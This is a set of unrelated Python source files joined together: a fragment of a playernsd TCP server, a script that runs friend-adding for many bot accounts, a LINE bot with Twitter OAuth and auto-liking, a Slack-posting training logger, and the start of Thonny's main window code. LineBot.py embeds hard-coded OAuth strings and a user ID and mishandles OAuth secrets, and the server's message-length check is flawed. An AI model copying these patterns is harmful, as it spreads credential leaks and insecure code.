self.send("registered\n")
elif cmd == 'listclients':
# list all the client ids
clientslist = 'listclients '
for name in client_manager.get_clientid_list():
if name != None:
clientslist += name + ' '
self.send(clientslist + '\n')
elif cmd == 'propget':
# get a property value
val = propget(command[0])
if val != None:
self.send('propval ' + command[0] + ' ' + val + '\n')
else: # Ask NS3
client_manager.prop_get_sim(command[0], self.client_address)
elif cmd == 'propset':
# set a property using a key & value
# TODO: is ' '.join safe?
key = command.pop(0)
val = propget(key)
if val != None:
propset(key, ' '.join(command))
else:
client_manager.prop_set_sim(key, ' '.join(command), self.client_address)
elif cmd == 'ping':
self.send('pong\n')
elif cmd == 'pong':
client_manager.pong(ca)
elif cmd == 'bye':
return
elif not client_manager.has_client(ca):
# if client has not registered
self.send('error notregistered\n')
elif cmd == 'msgtext':
if len(command) == 0: # zero param == broadcast
# prepare to send message next loop iteration
msg_broadcast = True
__state = RequestState.MSGTEXT
elif len(command) == 1: # two params == to a particular client
# send a message to a client
cid = command.pop(0)
if client_manager.has_client(cid):
_ca = client_manager.get_client(cid).address
# prepare to send message next loop iteration
msg_ca = client_manager.get_client(cid).address
msg_cs = client_manager.get_client(_ca).socket
msg_broadcast = False
__state = RequestState.MSGTEXT
else:
self.send('error unknownclient\n')
else: # else error that the param count is invalid
self.send('error invalidparamcount\n')
elif cmd == 'msgbin':
if len(command) == 1: # one param == broadcast
msglen = command.pop(0)
if msglen.isdigit() or msglen > MAX_SEND:
# check if all of the message is in the existing buffer
msg_len = int(msglen)
if len(data) >= msg_len:
msgbin = data[:msg_len]
data = data[msg_len:]
self.broadcast('msgbin ' + client_manager.get_client(ca).name + ' ' +
msglen + '\n' + msgbin)
else:
# Receive the required data in next iteration
msgbin = data
msg_len -= len(data)
data = ''
msg_broadcast = True
__state = RequestState.MSGBIN
else:
self.send('error invalidparam\n')
elif len(command) == 2: # two params == to a particular client
# send a binary message to a client
cid = command.pop(0)
if client_manager.has_client(cid):
_ca = client_manager.get_client(cid).address
_cs = client_manager.get_client(_ca).socket
msglen = command.pop(0)
if msglen.isdigit() or msglen > MAX_SEND:
# check if all of the message is in the existing buffer
msg_len = int(msglen)
if len(data) >= msg_len:
msgbin = data[:msg_len]
data = data[msg_len:]
self.send('msgbin ' + client_manager.get_client(ca).name + ' ' + msglen +
'\n' + msgbin, _cs, _ca)
else:
# Receive the required data in next iteration
msgbin = data
msg_len -= len(data)
msg_cs = _cs
msg_ca = _ca
msg_broadcast = False
__state = RequestState.MSGBIN
else: # error that the parameter is invalid (expected integer)
self.send('error invalidparam\n')
else: # error that the client is unknown
self.send('error unknownclient\n')
else: # else error that the param count is invalid
self.send('error invalidparamcount\n')
else:
log.warn(client_manager.get_id(ca) + ' Unknown command "' + cmd + '".')
self.send('error unknowncmd\n')
except socket.error, msg:
log.error(msg)
return
## Function that finalises communications with the client
#
# This will clear up references to disconnected clients and makes
# sure that the playernsd::ClientManager instance
# playernsd::client_manager no longer polls it.
# @param self The playernsd::TCPRequestHandler instance.
def finish(self):
# Shorthand for client address
ca = self.client_address
log.info(client_manager.get_id(ca) + ' Disconnected!')
# delete the items
client_manager.remove_client(ca)
# server host is a tuple ('host', port)
if __name__ == "__main__":
## Instance of option parser to parse command line arguments passed
parser = optparse.OptionParser(usage="usage: %prog [options] simulatorprogram")
parser.add_option("-i", "--ip", type="string", dest="ip", default=IP,
help="listen on IP", metavar="IP")
parser.add_option("-p", "--port", type="int",
dest="port", default=PORT,
help="don't print status messages to stdout")
parser.add_option("-v", "--verbose", action="store_const", const=2, dest="verbose",
default=VERBOSE, help="verbose logging")
parser.add_option("-q", "--quiet", action="store_const", const=0, dest="verbose",
default=VERBOSE, help="quiet logging")
parser.add_option("-l", type="string", dest="logfile", default=LOGFILE,
help="specify logfile", metavar="FILE")
parser.add_option("-o", type="string", dest="sim_options", default='',
help="options to simulation")
parser.add_option("-m", "--environment-image", type="string", dest="envimage",
help="environment image for line-of-sight communication")
(options, args) = parser.parse_args()
# If args is specified, load the script file
simulation = None
if len(args) > 0:
if os.path.exists(args[0]):
# Get module extension
module, extension = os.path.splitext(args[0])
if options.sim_options.find(',') != -1:
fullargs = options.sim_options.split(',')
else:
fullargs = []
fullargs.insert(0, args[0])
def recv_callback(_from, to, msg):
client_manager.recv_sim(_from, to, msg)
def prop_val_callback(_from, prop, val):
client_manager.prop_val_sim(_from, prop, val)
if extension == '.py':
script = imp.load_source(module, args[0])
simulation = script.Simulation(fullargs, recv_callback, prop_val_callback)
else:
# Run simulation with external binary
from playernsd.simulation import Simulation
simulation = Simulation(fullargs, recv_callback, prop_val_callback)
else:
print 'Cannot load script file ' + args[0] + '.'
sys.exit(1)
# Set the settings variables
IP = options.ip
PORT = options.port
LOGFILE = options.logfile
VERBOSE = options.verbose
# Setup the logging facility
## The logging level
loglevel = logging.DEBUG
if VERBOSE == 0:
loglevel = logging.ERROR
elif VERBOSE == 1:
loglevel = logging.INFO
# Playernsd logging
log = logging.getLogger('playernsd')
# Additional debug levels (for formatting)
# Default level
log.setLevel(loglevel)
# Stream handler
formatter = logging.Formatter(LOG_FORMAT)
hs = logging.StreamHandler()
hs.setFormatter(formatter)
hs.setLevel(loglevel)
log.addHandler(hs)
# Logfile handler
hf = logging.FileHandler(LOGFILE)
hf.setFormatter(formatter)
hf.setLevel(loglevel)
log.addHandler(hf)
try:
# Say what we're listening to & that we're verbose
log.info('Listening on ' + IP + ':' + str(PORT) + '.')
log.info('Verbosity=' + logging.getLevelName(loglevel) + ' logging' + '.')
# Create the socket server
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.ThreadingTCPServer((IP, PORT), TCPRequestHandler)
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
log.info('Server thread started.')
# Start the simulation
if simulation:
simulation.daemon = True
simulation.start()
## The client manager instance instantiated with the client timeout
# and the missed ping count
client_manager = ClientManager(CLIENT_TIMEOUT, MISSED_PING, simulation)
client_manager.daemon = True
client_manager.start()
log.info('Client manager thread started.')
# Main thread loop
while True:
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
log.info('Received keyboard interrupt, quitting threads.\n')
client_manager.stop()
# vim: ai:ts=2:sw=2:sts=2:
|
friends_manager.py
|
#!/bin/python3
import add_friends
from threading import Thread
import interaction_with_db
def main(table_name='accounts_bot'):
"""
Запускает add_friends.add_all_new_friends() для каждого бота в отдельном потоке
:param table_name: Имя таблицы с ботами в БД
:type table_name: str
"""
cur = interaction_with_db.get_cursor()
cur.execute("SELECT id FROM {}".format(table_name))
id_bots = (cur.fetchall())
threads = []
for id_bot in id_bots:
threads.append(Thread(target=add_friends.add_all_new_friends, args=(interaction_with_db.get_bot_data(cur, id_bot['id']),)))
threads[-1].start()
for thread in threads:
thread.join()
if __name__ == '__main__':
main()
|
LineBot.py
|
import tweepy
from flask import Flask, redirect, url_for, render_template,request,flash
import Data_analy
####
from multiprocessing import Process
from flask import Flask, request, abort
from linebot import (
LineBotApi, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, TextMessage, )
import Data_analy as data
import config
from DataBase.timetimetime import DB_line
url="https://ba8a4c63.ngrok.io"
DB = DB_line()
app = Flask(__name__)
CHANNEL_ACCESS_TOKEN = config.LINE_CHANNEL_ACCESS_TOKEN
CHANNEL_SECRET = config.LINE_CHANNEL_SECRET
line_bot_api = LineBotApi(CHANNEL_ACCESS_TOKEN)
handler = WebhookHandler(CHANNEL_SECRET)
GropeDict = {}
import queue
q = queue.Queue()
# @app.route("/")
# def hello_world():
# return "THIS IS LINE BOT"
@app.route("/callback", methods=['POST'])
def callback():
# get X-Line-Signature header value
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# handle webhook body
try:
handler.handle(body, signature)
except InvalidSignatureError:
print("Invalid signature. Please check your channel access token/channel secret.")
abort(400)
return 'OK'
# import web_api.weather
import requests
def get_today_Weather(**kwargs)->str:
id="280010"
url = f'http://weather.livedoor.com/forecast/webservice/json/v1?city={id}'
api_data = requests.get(url).json()
#print(api_data['title'])
## for weather in api_data['forecasts']:
# weather_date = weather['dateLabel']
# weather_forecasts = weather['telop']
# print(weather_date + ':' + weather_forecasts)
weather=max_temp=min_temp=None
try:
weather=api_data["forecasts"][0]["telop"]
max_temp=api_data["forecasts"][0]["temperature"]["max"]["celsius"]
min_temp = api_data["forecasts"][0]["temperature"]["min"]["celsius"]
except:
pass
finally:
return weather,max_temp,min_temp
userState={}
userId_tw={}
@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
# group か 個人かを判定
isGroup = (event.source.type == "group")
# print(isGroup)
# print(event)
user_id = event.source.user_id
msg_t = str(event.message.text)
if isGroup:
GroupId = event.source.group_id
global GropeDict
try:
GropeDict[GroupId] += [user_id]
GropeDict[GroupId] = list(set(GropeDict[GroupId]))
except:
GropeDict[GroupId] = [user_id]
# リクエストか
if msg_t in ["リクエスト", "バルス"]:
GroupId = event.source.group_id
print(GroupId)
# グループの各ユーザIDを取得
# users=line_bot_api.get_group_member_ids(GroupId)
##現在把握している(発言した)ユーザの趣向を出す。
# print(type(users),users)
userhobby = []
##DBに一人一人のユーザ趣向を問い合わせ
# for u in GropeDict[GroupId]:
# userhobby.append(DB.get_talk_his_table_from_userId(u))
dbd=DB.get_talk_his_table(True)
userhobby=Data_analy.countWords(dbd)
userhobby=userhobby[0]
# userhobby = list(set(userhobby))
# print("userhobby::", userhobby)
# userhobby = ",".join(userhobby)
LineSender(line_bot_api).sendMessage(text=userhobby+"をおすすめすると話題になるかもしれません。", user_id=GroupId)
return
#個人
else:
if msg_t=="tw_get":
userState[user_id]="q:t"
LineSender(line_bot_api).sendMessage(text="@から始まるTwitterIDを教えてね",user_id=user_id)
return
elif "@" in msg_t and userState[user_id]=="q:t":
userState[user_id]=None
userId_tw[user_id]=msg_t
LineSender(line_bot_api).sendMessage(text="OK!次のURLから連携してね",user_id=user_id)
LineSender(line_bot_api).sendMessage(text=url+"/twitter-regit",user_id=user_id)
return
print(user_id)
for w in Data_analy.wordAnyly(msg_t):
DB.set_talk_history(user_id,text=w)
# msg_t = str(event.message.text)
#print(msg_t)
# print(type(event))
# user_id = event.source.user_id
# profile = line_bot_api.get_profile(user_id)
# status = (profile.status_message)
# print(profile.display_name,msg_t)
# msg = TextMessage(text=f"name::{profile.display_name}\n"
# f"status_message::{status}")
# weather,max_temp,min_temp=get_today_Weather()
# msg=f"今日の天気は,{weather}\n" \
# f"最高気温は{max_temp}℃です。\n" \
# f"最低気温は{min_temp}℃です." \
# user=LineUser(userId=user_id)
# DB.set_new_user(user_id, user.name)
# words = data.analy(msg_t)
msg = "DBに保存しました"+msg_t
LineSender(line_bot_api).sendMessage(str(msg),user_id)
# msg_t=TextMessage(text=msg)
# msg2=TextMessage(text=str(user))
# for r in range(10):
# line_bot_api.push_message(user_id, msg_t)
# line_bot_api.push_message(user_id, msg2)
# line_bot_api.push_message(user_id, msg_t)
def q_put(q, msg):
q.put(msg)
class LineUser:
def __init__(self,reply=None,userId=None):
'''line のユーザ情報クラス ここではreplayからUserIdを取得することも
できるし、そのままuserIdを入力できる。
そこからLine APIを通して、名前と ひとこと(status message)を取得する。
'''
#reply か userIdどちらも情報がない場合,userIdはNone とする。
if (reply or userId):
##replyからuserIdを取得
if reply:
self.userId = reply.source.user_id
else:
self.userId=userId
#replyから名前とひとことを取得
profile = line_bot_api.get_profile(self.userId)
self.status = (profile.status_message)
self.name=profile.display_name
else:
self.userId=None
self.name=None
self.status=None
def __eq__(self, other):
if type(other)==LineUser:
return self.userId == other.userId
else:
return self.userId== other
def __str__(self):
return f"userId::{self.userId}\n" \
f"userName::{self.name}\n" \
f"userStatus::{self.status}"
class LineSender:
def __init__(self,lineins:LineBotApi):
self.line_bot_api=lineins
def sendMessage(self,text:str,user_id:LineUser):
if isinstance(user_id,LineUser):
user_id=user_id.userId
msg=TextMessage(text=text)
self.line_bot_api.push_message(to=user_id,messages=msg)
############################ HTML TWITTER SERVER ############################
import twitter
ck = config.tw_ck
cs = config.tw_cs
auth = tweepy.OAuthHandler(ck, cs)
app.secret_key = config.tw_secret_key #Flashのために必要
@app.route("/")
def tw_INDEX():
return render_template("index_.html")
@app.route('/twitter-regit')
def tw_main():
try:
redirect_url = auth.get_authorization_url()
print("tw regit")
# return render_template("index.html", redirect_url=redirect_url)
return redirect(redirect_url)
except tweepy.TweepError as r:
flash('認証に失敗しました。もう一度やり直してください。')
print(r.reason)
return render_template("error.html")
# return render_template("index.html", redirect_url=redirect_url)
@app.route('/twitter-callback')
def tw_callback():
try:
token = request.values.get('oauth_token', '')
verifier = request.values.get('oauth_verifier', '')
flash('認証に成功しました。しばらくお待ちください')
#################
auth.request_token = {'oauth_token':token, 'oauth_token_secret':verifier}
try:
auth.get_access_token(verifier)
except tweepy.TweepError:
print('Erroredirect Failed to get access token.')
# AT = auth.access_token
# AS = auth.access_token_secret
api=tweepy.API(auth,wait_on_rate_limit=False)
# ScreenName;
print(api.me())
for favorite in tweepy.Cursor(api.favorites).items(50):
# Basic information about the user who created the tweet that was favorited
# print('\n\n\nTweet Author:')
# # Print the screen name of the tweets auther
# print('Screen Name: ' + str(favorite.user.screen_name.encode("utf-8")))
# print('Name: ' + str(favorite.user.name.encode("utf-8")))
#
# # Basic information about the tweet that was favorited
# print('\nTweet:')
# # Print the id of the tweet the user favorited
# print('Tweet Id: ' + str(favorite.id))
# # Print the text of the tweet the user favorited
print('Tweet Text: ' + str(favorite.text.encode("utf-8")))
# for tweet in tweepy.Cursor(api.user_timeline, screen_name="取得したい垢名をここに入れる", exclude_replies=True).items():
# tweet_data.append(
# [tweet.id, tweet.created_at, tweet.text.replace('\n', ''), tweet.favorite_count, tweet.retweet_count])
# ################
except:
return render_template("callback.html", token=token, verifier=verifier)
# except Exception as e:
# print("callback error",e)
# return render_template("error.html")
# @app.route('/tw/<id>')
# def tw_callback(id):
# try:
# # token = request.values.get('oauth_token', '')
# # verifier = request.values.get('oauth_verifier', '')
# #flash('認証に成功しました。')
#
# token="YgcasAAAAAABAX3zAAABbeaxN6E"
# verifier="CyXOWyFrwcRb3KLBCpqMkbXoDLTuUtZW"
#
# #################
# auth.request_token = {'oauth_token':token, 'oauth_token_secret':verifier}
# try:
# auth.get_access_token(verifier)
# except tweepy.TweepError:
# print('Erroredirect Failed to get access token.')
#
# AT = auth.access_token
# AS = auth.access_token_secret
#
# api=tweepy.API(auth,wait_on_rate_limit=False)
# # ScreenName;
# print(api.me())
# for favorite in tweepy.Cursor(api.favorites,id=id).items(20):
# # Basic information about the user who created the tweet that was favorited
# print('\n\n\nTweet Author:')
# # Print the screen name of the tweets auther
# print('Screen Name: ' + str(favorite.user.screen_name.encode("utf-8")))
# print('Name: ' + str(favorite.user.name.encode("utf-8")))
#
# # Basic information about the tweet that was favorited
# print('\nTweet:')
# # Print the id of the tweet the user favorited
# print('Tweet Id: ' + str(favorite.id))
# # Print the text of the tweet the user favorited
# print('Tweet Text: ' + str(favorite.text.encode("utf-8")))
#
# # ################
# except:
# pass
#
# return render_template("callback.html", token=token, verifier=verifier)
# # except Exception as e:
# # print("callback error",e)
# # return render_template("error.html")
#
@app.route("/users/<username>")
def createHTML(username):
## todo databese から趣味、アイコン、名前、sns,取得
iconURL=sns=hobby="None"
try:
userid=DB.get_id(username)
hobby=DB.get_talk_his_table_from_userId(userid)
except:
pass
# hobby=['アメリカフットボール', 'けもフレ']
# # hobby=",".join(hobby)
# iconURL="https://booth.pximg.net/0e273b68-3273-49c3-8e2b-90672b1ea0cc/i/487672/ff1c97aa-1775-4320-8a5e-6a7cbabf2460_base_resized.jpg"
twitter="https://twitter.com/ユーザー名"
facebook="https://twitter.com/ユーザー名"
google_plus="https://twitter.com/ユーザー名"
tumblr="https://twitter.com/ユーザー名"
youtube="https://twitter.com/ユーザー名"
return render_template("meishi.html",icon_img=iconURL,user_name=username,hobby_list=hobby,
twitter=twitter,google_plus=google_plus,facebook=facebook,youtube=youtube)
@app.route('/input', methods=["POST"])
def tw_input():
if request.method == "POST":
text = request.form["text"]
token = request.form["token"]
verifier = request.form["verifier"]
auth.request_token = {'oauth_token':token, 'oauth_token_secret':verifier}
try:
auth.get_access_token(verifier)
except tweepy.TweepError:
print('Erroredirect Failed to get access token.')
AT = auth.access_token
AS = auth.access_token_secret
api=tweepy.API(auth,wait_on_rate_limit=False)
# ScreenName;
print(api.me())
tweepy.Cursor(api.favorites)
twitter.twitter_fav(text,AT,AS)
flash(text + 'を含むツイートにいいねをつけました。')
return redirect("https://twi-api-test.herokuapp.com/")
def get_goodTweet():
pass
def _args():
app.run(debug=False, host='0.0.0.0', port=5000)
def start():
s = Process(target=_args)
s.start()
return q
if __name__ == "__main__":
q = start()
# # app.run(debug=True, host='0.0.0.0', port=5000)
# userId="U8c8b0e06213c94bc4c7f42cac57cf1a7"
# user=LineUser(userId=userId)
# sender=LineSender(line_bot_api)
while 1:
# sender.sendMessage(text=str(user),user_id=user)
#
pass
|
infolog.py
|
import atexit
from datetime import datetime
import json
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a',encoding='utf-8')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new training run\n')
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, slack=False):
print(msg)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
import webbrowser
import gettext
from threading import Thread
from tkinter import ttk, messagebox
from typing import (
Any,
Callable,
Dict,
List,
Optional, # pylint: disable=unused-import
Sequence,
Set, # pylint: disable=unused-import
Tuple, # pylint: disable=unused-import
Type,
Union,
cast,
) # pylint: disable=unused-import
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
get_runner,
running,
ui_utils,
assistance,
languages,
get_shell,
is_portable,
)
from thonny.code import EditorNotebook
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.misc_utils import (
running_on_linux,
running_on_mac_os,
running_on_windows,
running_on_rpi,
copy_to_clipboard,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_diagnostic_logging()
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._add_main_backends()
self._init_theming()
self._init_window()
self.add_view(ShellView, _("Shell"), "s", visible_by_default=True, default_position_key="A")
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
self._init_regular_mode_link()
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
def _init_language(self) -> None:
"""Initialize language."""
language_code = self.get_option("general.language")
if language_code in languages.LANGUAGES_DICT:
path = os.path.join(os.path.dirname(__file__), "locale")
language = gettext.translation("thonny", path, [language_code])
language.install()
def _get_logging_level(self) -> int:
if self.in_debug_mode():
return logging.DEBUG
else:
return logging.INFO
def _init_diagnostic_logging(self) -> None:
logFormatter = logging.Formatter("%(levelname)s: %(message)s")
root_logger = logging.getLogger()
log_file = os.path.join(THONNY_USER_DIR, "frontend.log")
file_handler = logging.FileHandler(log_file, encoding="UTF-8", mode="w")
file_handler.setFormatter(logFormatter)
file_handler.setLevel(self._get_logging_level())
root_logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(logFormatter)
console_handler.setLevel(self._get_logging_level())
root_logger.addHandler(console_handler)
root_logger.setLevel(self._get_logging_level())
import faulthandler
fault_out = open(os.path.join(THONNY_USER_DIR, "frontend_faults.log"), mode="w")
faulthandler.enable(fault_out)
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", _("File"))
self.get_menu("edit", _("Edit"))
self.get_menu("view", _("View"))
self.get_menu("run", _("Run"))
self.get_menu("tempdevice", "Device")
self.get_menu("tools", _("Tools"))
self.get_menu("help", _("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(
thonny.plugins.__path__, "thonny.plugins." # type: ignore
)
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
